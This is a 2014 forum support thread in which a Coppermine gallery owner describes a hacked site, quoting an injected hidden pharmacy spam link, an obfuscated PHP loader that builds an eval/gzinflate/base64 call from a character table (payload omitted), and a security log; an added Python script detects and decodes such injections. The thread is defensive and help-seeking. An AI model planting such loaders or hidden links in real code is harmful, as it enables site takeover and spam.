forum.coppermine-gallery.net

Support => Looking for Freelancers / Paid help => Topic started by: statek on February 24, 2014, 12:28:41 pm

Title: Coppermine gallery was hacked with hidden link in footer. Need help!
Post by: statek on February 24, 2014, 12:28:41 pm
Hello CPG community.

My CPG gallery 1.4.27 (kosivart.net) was hacked and I need advice or help:

1. A hidden link appeared in the footer on every page, like:
Code:
<font style='position: absolute;overflow: hidden;height: 0;width: 0'><a href="on line ph a r m ac y. c o m">on line ph a r m ac y</a></font>
2. Every PHP file was edited, with code like this added at the top:

Code:
<?php
// As quoted in the post; the '=' signs were dropped by the forum's code view.
$md5 = "d7d802e57d69950fc02f71341bd1efc1";
// $a6 is a character table. Indexed into it, the chain below spells out
// eval(gzinflate(base64_decode($v))); which create_function() wraps as $b67.
$a6 = array("$",";","t",'g',"_",'z','b',"d",')',"o","a","s",'v','6','e',"c",'r','4',"(",'i','f','l',"n");
$b67 = create_function('$'.'v',$a6[14].$a6[12].$a6[10].$a6[21].$a6[18].$a6[3].$a6[5].$a6[19].$a6[22].$a6[20].$a6[21].$a6[10].$a6[2].$a6[14].$a6[18].$a6[6].
$a6[10].$a6[11].$a6[14].$a6[13].$a6[17].$a6[4].$a6[7].$a6[14].$a6[15].$a6[9].$a6[7].$a6[14].$a6[18].$a6[0].$a6[12].$a6[8].$a6[8].$a6[8].$a6[1]);
$b67('...'); // long encoded payload omitted
?>

3. Here is the security log:
Code:
<?php

/*************************
  Coppermine Photo Gallery
  ************************
  Copyright (c) 2003-2014 Coppermine Dev Team
  v1.0 originally written by Gregory Demar

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License version 3
  as published by the Free Software Foundation.

  ********************************************
  Coppermine version: 1.5.26
  $HeadURL: https://svn.code.sf.net/p/coppermine/code/trunk/cpg1.5.x/logs/log_header.inc.php $
  $Revision: 8638 $
  **********************************************/

if (!defined('IN_COPPERMINE')) die('Not in Coppermine...');

?>
2014-02-23 18:14:12 - Denied privileged access to functions.inc.php by user Guest at IP 5.10.83.48
2014-02-23 18:14:12 - Invalid form token encountered for functions.inc.php by user Guest at IP 5.10.83.48
2014-02-23 18:15:48 - Denied privileged access to functions.inc.php by user Guest at IP 157.56.93.51
2014-02-23 18:15:48 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.56.93.51
2014-02-23 18:17:29 - Denied privileged access to functions.inc.php by user Guest at IP 157.55.36.45
2014-02-23 18:17:29 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.55.36.45
2014-02-23 18:17:29 - Denied privileged access to functions.inc.php by user Guest at IP 157.55.36.45
2014-02-23 18:17:29 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.55.36.45
2014-02-23 18:17:29 - Denied privileged access to functions.inc.php by user Guest at IP 157.55.36.45
2014-02-23 18:17:29 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.55.36.45
2014-02-23 18:17:29 - Denied privileged access to functions.inc.php by user Guest at IP 157.55.36.45
2014-02-23 18:17:29 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.55.36.45
2014-02-23 18:17:29 - Denied privileged access to functions.inc.php by user Guest at IP 157.55.36.45
2014-02-23 18:17:29 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.55.36.45
2014-02-23 18:18:03 - Denied privileged access to functions.inc.php by user Guest at IP 195.162.81.150
2014-02-23 18:18:03 - Invalid form token encountered for functions.inc.php by user Guest at IP 195.162.81.150
2014-02-23 18:18:51 - Denied privileged access to functions.inc.php by user Guest at IP 5.10.83.84
2014-02-23 18:18:51 - Invalid form token encountered for functions.inc.php by user Guest at IP 5.10.83.84
2014-02-23 18:20:15 - Denied privileged access to functions.inc.php by user Guest at IP 46.200.97.26
2014-02-23 18:20:15 - Invalid form token encountered for functions.inc.php by user Guest at IP 46.200.97.26
2014-02-23 18:20:54 - Denied privileged access to functions.inc.php by user Guest at IP 157.56.93.74
2014-02-23 18:20:54 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.56.93.74
2014-02-23 18:20:54 - Denied privileged access to functions.inc.php by user Guest at IP 157.56.93.74
2014-02-23 18:20:54 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.56.93.74
2014-02-23 18:21:32 - Denied privileged access to functions.inc.php by user Guest at IP 157.55.32.226
2014-02-23 18:21:32 - Invalid form token encountered for functions.inc.php by user Guest at IP 157.55.32.226
2014-02-23 18:26:30 - Denied privileged access to functions.inc.php by user Guest at IP 5.10.83.84
2014-02-23 18:26:30 - Invalid form token encountered for functions.inc.php by user Guest at IP 5.10.83.84
Лют 23, 2014 - 18:27 - Denied privileged access to versioncheck.php by user Guest at IP 46.200.97.26
Лют 23, 2014 - 18:28 - Denied privileged access to admin.php by user Guest at IP 46.200.97.26
Лют 23, 2014 - 18:53 - Denied privileged access to register.php by user Guest at IP 188.240.143.217
Лют 23, 2014 - 19:11 - Denied privileged access to register.php by user Guest at IP 192.95.43.213
Лют 23, 2014 - 19:17 - Denied privileged access to register.php by user Guest at IP 173.232.107.157
Лют 23, 2014 - 19:53 - Denied privileged access to register.php by user Guest at IP 23.88.104.142
Лют 23, 2014 - 21:28 - Denied privileged access to register.php by user Guest at IP 192.95.0.202
Лют 23, 2014 - 23:33 - Denied privileged access to register.php by user Guest at IP 192.3.182.139
Лют 24, 2014 - 00:30 - Denied privileged access to register.php by user Guest at IP 184.154.187.86
Лют 24, 2014 - 03:16 - Denied privileged access to register.php by user Guest at IP 199.200.120.136
Лют 24, 2014 - 03:19 - Denied privileged access to register.php by user Guest at IP 216.152.251.87
Лют 24, 2014 - 04:12 - Denied privileged access to register.php by user Guest at IP 89.47.17.127
Лют 24, 2014 - 04:56 - Denied privileged access to register.php by user Guest at IP 62.113.243.249
Лют 24, 2014 - 06:09 - Denied privileged access to register.php by user Guest at IP 78.47.154.199
Лют 24, 2014 - 07:05 - Denied privileged access to register.php by user Guest at IP 81.65.64.16
Лют 24, 2014 - 07:35 - Denied privileged access to register.php by user Guest at IP 216.152.251.87
Feb 24, 2014 at 07:35 AM - Denied privileged access to register.php by user Guest at IP 216.152.251.87
Лют 24, 2014 - 07:38 - Denied privileged access to register.php by user Guest at IP 107.161.85.157
Лют 24, 2014 - 08:01 - Denied privileged access to register.php by user Guest at IP 5.153.235.31
Лют 24, 2014 - 08:27 - Denied privileged access to register.php by user Guest at IP 151.236.15.145
Feb 24, 2014 at 08:27 AM - Denied privileged access to register.php by user Guest at IP 151.236.15.145
Лют 24, 2014 - 09:07 - Denied privileged access to register.php by user Guest at IP 94.23.150.152
Лют 24, 2014 - 10:40 - Denied privileged access to register.php by user Guest at IP 199.119.225.102
Feb 24, 2014 at 10:40 AM - Denied privileged access to register.php by user Guest at IP 199.119.225.102
Лют 24, 2014 - 10:44 - Denied privileged access to admin.php by user Guest at IP 46.200.106.202
Лют 24, 2014 - 11:06 - Denied privileged access to register.php by user Guest at IP 81.65.64.16
Лют 24, 2014 - 11:44 - Invalid form token encountered for admin.php by user diamond at IP 46.200.106.202
Лют 24, 2014 - 11:47 - Invalid form token encountered for admin.php by user diamond at IP 46.200.106.202
Лют 24, 2014 - 12:01 - Denied privileged access to viewlog.php by user Guest at IP 66.249.73.162

So I already upgraded to the latest version, 1.5.26, and changed the admin password. But that didn't help :( Today I saw the hidden link again, and all PHP files had been edited with the PHP md5 code again.
For now I have replaced all files from a fresh install, but I think the link will be back tomorrow :(

A few more notes:
1. I use GoDaddy shared Linux hosting.
2. I also have WordPress sites on my account, and they were hacked too (one example: kosivrada.if.ua) with a hidden link in the footer! Upgrading WP and the plugins to the latest version removes the link, but the next day it comes back!

Please, community, somebody help me with this, because the hacker can ruin your site too!

How can I secure my gallery from this spammer?

Maybe some qualified developer team can handle this issue. I can give FTP and DB access, and I'm ready to pay for that work.
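As an added example (not part of the original post or of Coppermine), a small Python triage script for the two indicators statek describes: it pulls hrefs out of zero-size or hidden containers like the footer snippet, and it reconstructs strings that a PHP prologue assembles from a character array, so a defender can read what the injected code actually calls instead of guessing. The sample HTML and PHP are constructed; the array is the one quoted in the post, with the hash, the payload and the link target replaced by placeholders.

```python
import re

# Detectors for the two indicators in the post: a link hidden inside a
# zero-size container, and a PHP prologue that builds a function name by
# concatenating elements of a character array. Sample inputs are constructed.
HIDDEN_BOX = re.compile(
    r"<(font|div|span|p)\b[^>]*style=(['\"])[^'\"]*"
    r"(?:height:\s*0|width:\s*0|display:\s*none)[^'\"]*\2[^>]*>.*?</\1>",
    re.I | re.S)
HREF = re.compile(r"<a\s[^>]*href=(['\"])(.*?)\1", re.I | re.S)

def find_hidden_links(page_html):
    """Return hrefs of <a> tags wrapped in a zero-size or display:none box."""
    hits = []
    for box in HIDDEN_BOX.finditer(page_html):
        hits.extend(href for _, href in HREF.findall(box.group(0)))
    return hits

ARRAY_DEF = re.compile(r"\$(\w+)\s*=\s*array\((.*?)\);", re.S)
ELEMENT = re.compile(r"""(['"])(.*?)\1""")
INDEX_CHAIN = re.compile(r"(?:\$\w+\[\d+\]\.?)+")
LOOKUP = re.compile(r"\$(\w+)\[(\d+)\]")

def decode_index_obfuscation(php_source, min_lookups=3):
    """Rebuild strings assembled as $arr[i].$arr[j]... from arrays in the file."""
    # Legitimate code almost never spells identifiers out of a lookup table,
    # so anything this returns deserves a close look.
    tables = {name: [e for _, e in ELEMENT.findall(body)]
              for name, body in ARRAY_DEF.findall(php_source)}
    decoded = []
    for chain in INDEX_CHAIN.finditer(php_source):
        lookups = LOOKUP.findall(chain.group(0))
        if len(lookups) < min_lookups:
            continue
        try:
            decoded.append("".join(tables[n][int(i)] for n, i in lookups))
        except (KeyError, IndexError):
            continue  # table defined elsewhere or index out of range: skip
    return decoded

# Constructed samples: the array quoted in the post with hash and payload
# replaced by placeholders, and a footer carrying the hidden link.
SAMPLE_PHP = '''<?php
$md5 = "PLACEHOLDER_HASH";
$a6 = array("$",";","t",'g',"_",'z','b',"d",')',"o","a","s",'v','6','e',"c",'r','4',"(",'i','f','l',"n");
$b67 = create_function('$'.'v',$a6[14].$a6[12].$a6[10].$a6[21].$a6[18].$a6[3].$a6[5].$a6[19].$a6[22].$a6[20].$a6[21].$a6[10].$a6[2].$a6[14].$a6[18].$a6[6].$a6[10].$a6[11].$a6[14].$a6[13].$a6[17].$a6[4].$a6[7].$a6[14].$a6[15].$a6[9].$a6[7].$a6[14].$a6[18].$a6[0].$a6[12].$a6[8].$a6[8].$a6[8].$a6[1]);
$b67('PLACEHOLDER_PAYLOAD');
?>'''
SAMPLE_HTML = ('<div id="footer">Powered by Coppermine</div>'
               "<font style='position: absolute;overflow: hidden;height: 0;width: 0'>"
               '<a href="http://example.invalid/">on line ph a r m ac y</a></font>')
```

Run over every .php and template file under the web root, anything returned by either function is a candidate for restoring from a clean copy.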
Title: Re: Coppermine gallery was hacked with hidden link in footer. Need help!
Post by: phill104 on February 24, 2014, 12:47:54 pm
I've sent you an email.
Title: Re: Coppermine gallery was hacked with hidden link in footer. Need help!
Post by: statek on March 06, 2014, 06:57:11 pm
I want to thank Phill for support in this issue!

The problem is actually not in CPG but in the shared hosting account, on which I also host sites running WordPress and Joomla. Some sites had outdated CMS versions, so it's no wonder my account was hacked.

So, everyone, check your sites for hidden pharma links, and in any case update your sites to the latest versions to avoid future problems and wasted time.
Title: Re: Coppermine gallery was hacked with hidden link in footer. Need help!
Post by: statek on March 06, 2014, 07:41:50 pm
Helpful links in case your site has been hacked: